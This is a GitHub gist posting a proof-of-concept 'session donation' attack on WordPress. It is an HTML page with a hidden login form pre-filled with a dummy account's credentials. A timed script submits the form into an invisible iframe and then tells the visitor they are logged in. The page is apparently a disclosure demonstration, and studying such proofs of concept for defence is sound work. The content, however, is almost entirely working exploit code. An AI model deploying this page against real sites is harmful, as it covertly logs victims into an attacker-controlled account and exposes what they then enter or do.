Skip to content

Instantly share code, notes, and snippets.

Created January 25, 2017 06:51
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save bjornjohansen/f780c250ba2f1c712abdaea4a5781e2c to your computer and use it in GitHub Desktop.
Proof of concept: Session donation attack in WordPress
<!DOCTYPE html>
<title>Hello Friend</title>
<h1>Hello friend</h1>
<p id="status">Please wait …</p>
<form name="loginform" id="loginform" action="" method="post" target="myframe" style="display:none">
<input name="log" id="user_login" value="dummyuser" type="text">
<input name="pwd" id="user_pass" value="Correct Horse Battery Staple" type="text">
<input name="wp-submit" id="wp-submit" value="Log In" type="submit">
<input name="redirect_to" value="" type="hidden">
<input name="testcookie" value="1" type="hidden">
<iframe src="" style="display:none" name="myframe"></iframe>
setTimeout( function() {
document.getElementById( 'loginform' ).submit();
document.getElementById( 'status' ).innerHTML = 'You are now logged into <a href=""></a>';
}, 2000 );
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment